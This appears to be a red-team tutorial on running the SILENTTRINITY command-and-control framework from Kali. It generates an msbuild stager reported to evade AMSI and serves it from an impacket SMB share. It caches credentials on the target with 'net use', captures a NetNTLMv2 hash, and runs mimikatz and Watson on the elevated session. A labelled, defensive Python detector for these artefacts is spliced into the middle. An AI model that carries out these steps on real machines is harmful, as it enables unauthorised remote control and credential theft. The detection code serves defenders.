Using Kali as a C2 Server
git clone https://github.com/SecureAuthCorp/impacket.git
pip install -r requirements.txt
python setup.py install
apt install python3.7 python3.7-dev python3-pip
git clone https://github.com/byt3bl33d3r/SILENTTRINITY
python3.7 -m pip install -r requirements.txt
#Start it up
Ready to go
Proceed with selecting a listener, binding it to an IP + port and starting it. By the way, I set my BindIP to a different subnet because I am connected to my test lab using VPN. Nothing magic going on.
set BindIP 10.0.8.6
Proceed to generate a stager. It will end up in the
Now, find an appropriate way of downloading and triggering the stager. As of November 2018, the msbuild stager payloads still haven't triggered AMSI on Windows 10 1803.
A neat trick is using an SMB server to serve the payload. Download and trigger it with msbuild and the UNC path to your SMB server as the argument.
First create a share folder and then start the SMB server from impacket.
smbserver.py SMB /opt/SMB -username hacker -password hacker -smb2support -ip 10.0.8.6
Now we try to trigger the payload with msbuild, but it fails because we aren't authenticated.
cp /opt/SILENTTRINITY/Server/msbuild.xml /opt/SMB/msbuild.xml
So why did we specify credentials then? On Windows 10 you can't use SMB unauthenticated by default, and as far as I know there isn't a way to give msbuild credentials directly. So I fiddled around and found a little trick to cache some credentials for my SMB server on the host. As you see, I use hacker/hacker for authentication. Very secure of course. On the target, trigger an authenticated net use command. This should try to access the SMB share with the specified credentials, and therefore cache them locally on the target. From an opsec perspective this isn't ideal, so if you have suggestions please reach out.
net use \\10.0.8.6\smb /user:hacker hacker
We see that we get a successful authentication and a NetNTLMv2 hash instantly. So now with cached credentials on the target, let's try to trigger our payload again.
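The procedure above leaves two host-side artefacts a defender can key on: msbuild.exe being handed a project file that lives on an IP-addressed UNC share, and net use authenticating to an IP-addressed share with explicit credentials. As an added example (not code from the original post, SILENTTRINITY or impacket), the following Python scans constructed process-creation records for both patterns. The "image | command line" record format and the sample lines are constructed assumptions, loosely modelled on the Image and CommandLine fields of a Sysmon process-creation event; real telemetry would need its own parser.

```python
import re
from dataclasses import dataclass

# Constructed sample process-creation records (not real logs). Format assumed:
# "<image path> | <command line>", one record per line.
SAMPLE_EVENTS = [
    r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe | MSBuild.exe \\10.0.8.6\smb\msbuild.xml",
    r"C:\Windows\System32\net.exe | net use \\10.0.8.6\smb /user:hacker hacker",
    r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe | MSBuild.exe C:\src\app\app.csproj /t:Build",
    r"C:\Windows\System32\net.exe | net use Z: \\fileserver.corp.example\public",
]

# A UNC path whose host part is a dotted IPv4 address, e.g. \\10.0.8.6\smb\x.xml
UNC_IP_PATH = re.compile(r"\\\\(\d{1,3}(?:\.\d{1,3}){3})\\\S+")
# File extensions msbuild will happily treat as a project
PROJECT_EXT = re.compile(r"\.(?:xml|proj|csproj|vbproj|targets)\b", re.IGNORECASE)


@dataclass
class Finding:
    rule: str
    image: str
    command_line: str


def parse_event(line: str):
    """Split a constructed record into (image, command line)."""
    image, _, cmd = line.partition(" | ")
    return image.strip(), cmd.strip()


def check_msbuild_unc(image: str, cmd: str):
    """msbuild.exe building a project file fetched from an IP-addressed share."""
    if not image.lower().endswith("msbuild.exe"):
        return None
    if UNC_IP_PATH.search(cmd) and PROJECT_EXT.search(cmd):
        return Finding("msbuild-remote-project", image, cmd)
    return None


def check_net_use_creds(image: str, cmd: str):
    """net use to an IP-addressed share with credentials passed on the command line."""
    if not image.lower().endswith("net.exe"):
        return None
    lower = cmd.lower()
    if " use " in lower and "/user:" in lower and UNC_IP_PATH.search(cmd):
        return Finding("net-use-ip-share-with-creds", image, cmd)
    return None


def scan(events):
    """Run every check over every record and collect the findings."""
    findings = []
    for line in events:
        image, cmd = parse_event(line)
        for check in (check_msbuild_unc, check_net_use_creds):
            finding = check(image, cmd)
            if finding:
                findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.image}: {f.command_line}")
```

The two benign records (a local .csproj build and a drive mapping to a hostname-based share without inline credentials) are there to show the checks do not fire on ordinary activity; in practice the IP-vs-hostname heuristic is a tuning knob, since some environments legitimately map shares by address.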
Voila! Something started happening. Let's check back in ST.
Like sweet magic, we got a session. The authentication reuses the credentials that were cached.
Now we list the session we just acquired. Because I triggered the payload from an elevated shell, we have a session with elevated privileges. That allows us to do things like dump credentials and other kinds of post exploitation fun.
So let's explore some of the post exploitation modules that ST has to offer. As you can see, ST has a lot of built-in modules already and by the looks of it, there are more to come.
Let's select the mimikatz module and run it against our session. Word of notice here: you have to copy the GUID from the session list so you have it ready. You can alternatively use run all to run it on all sessions, if you have several.
Running the shell module for good measure
set Command whoami
set Assembly /opt/Watson.exe
Didn't find anything on my patched Windows 10 1803 VM, but that's ok.